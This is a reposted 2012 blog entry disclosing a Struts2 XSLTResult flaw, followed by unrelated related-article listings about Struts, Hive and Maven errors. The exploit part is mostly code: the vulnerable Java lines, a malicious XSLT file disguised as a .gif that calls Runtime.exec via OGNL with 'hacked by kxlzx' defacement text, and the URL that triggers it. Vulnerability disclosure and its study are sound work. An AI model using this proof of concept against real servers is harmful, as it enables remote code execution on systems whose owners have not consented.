struts2 xsltResult Local code execution vulnerability

转载 2012年03月26日 12:57:10

 

the file:

http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java

String pathFromRequest = ServletActionContext.getRequest().getParameter("xslt.location");
path = pathFromRequest;
URL resource = ServletActionContext.getServletContext().getResource(path);
templates = factory.newTemplates(new StreamSource(resource.openStream()));

A use of the action of xsltResult:
<action name="xslt" class="net.inbreak.xsltAction">
<result type="xslt"/>
</action>

An attacker can upload a file:

/upload/7758521.gif

<?xml version="1.0" encoding="UTF-8" ?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform";
version="1.0" xmlns:ognl="ognl.Ognl">
<xsl:template match="/">
<html>
<body>
<h2>hacked by kxlzx</h2>
<h2>http://www.inbreak.net</h2>
<exp>
<xsl:value-of select="ognl:getValue(&apos;@Runtime () getRuntime().exec("calc")&apos;, &apos;&apos;)"/>
</exp>
</body>
</html>
</xsl:template>
</xsl:stylesheet>

open url

http://www.inbreak.net/xslt.action?xslt.location=upload/7758521.gif

then struts2 will execute

ognl:getValue(&apos;@Runtime () getRuntime().exec("calc")&apos;, &apos;&apos;)

 

Struts 2 S2-045 Jakarta插件远程代码执行漏洞加固方法

近日,安恒信息安全研究院WEBIN实验室高级安全研究员nike.zheng发现著名J2EE框架-Struts2存在远程代码执行的严重漏洞。 漏洞编号: S2-045,CVE-2017-5638...
  • xiao190128
  • xiao190128
  • 2017年03月10日 18:14
  • 1583

Apache Struts2再爆高危漏洞

60网站安全检测最新struts2命令执行漏洞分析 时间:2013-07-18 09:46   在struts2中,DefaultActionMa...
  • dongdong_java
  • dongdong_java
  • 2013年12月31日 13:24
  • 4732

IDEA+maven搭建web框架

一、安装maven   配置环境变量:M2_HOME=D:\maven\apache-maven-3.3.3                               path:%M2_HOME%\...
  • kobexiaol
  • kobexiaol
  • 2016年01月24日 21:10
  • 7365

Struts2/XWork < 2.2.0 Remote Command Execution Vulnerability

Struts2/XWork
  • cnbird2008
  • cnbird2008
  • 2010年07月16日 10:38
  • 2859

idea 创建maven web 项目时报错

怎么办呀,在线等
  • Sxueen
  • Sxueen
  • 2016年12月17日 08:44
  • 2785

hive执行任务报错Execution failed with exit status: 3

Execution failed with exit status: 3 FAILED: Execution Error, return code 3 from org.apache.hadoop.h...
  • yhao2014
  • yhao2014
  • 2015年01月13日 12:41
  • 4459

一次hive reduce oom 处理:Execution Error, return code 2 from org.apache.hadoop.hive.ql.exec.mr.MapRedTas

问题: hive job失败,现象reduce失败,起了新的reduc而后还是失败,最终job失败 错误: 2017-06-07 16:43:20 INFO Examining task ID: ta...
  • smile0198
  • smile0198
  • 2017年06月11日 11:04
  • 2429

hive创建表失败:FAILED: Execution Error, return code 1 from org.apache.hadoop.hive.ql.exec.DDLTask.

前言:本文是在博主:http://blog.sina.com.cn/s/blog_7673d4a50102v7s1.html;博客基础上对遇到的问题的一个总结 把hive 的metada...
  • qq_35732963
  • qq_35732963
  • 2017年01月06日 16:37
  • 2135

FAILED: Execution Error, return code 1 from org.apache.hadoop.hive.ql.exec.DDLTask. java.lang.Runtim

解决hiveFAILED: Execution Error, return code 1 from org.apache.hadoop.hive.ql.exec.DDLTask. java.lang....
  • qq741997129
  • qq741997129
  • 2014年05月24日 10:49
  • 7257

关于java.sql.SQLException: Query execution was interrupted异常的原因

数据库交互部分报异常信息: Caused by: org.springframework.jdbc.UncategorizedSQLException: SqlMapClient operation...
  • ielqx2012
  • ielqx2012
  • 2011年09月29日 10:15
  • 2546
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:struts2 xsltResult Local code execution vulnerability
举报原因:
原因补充:

(最多只允许输入30个字)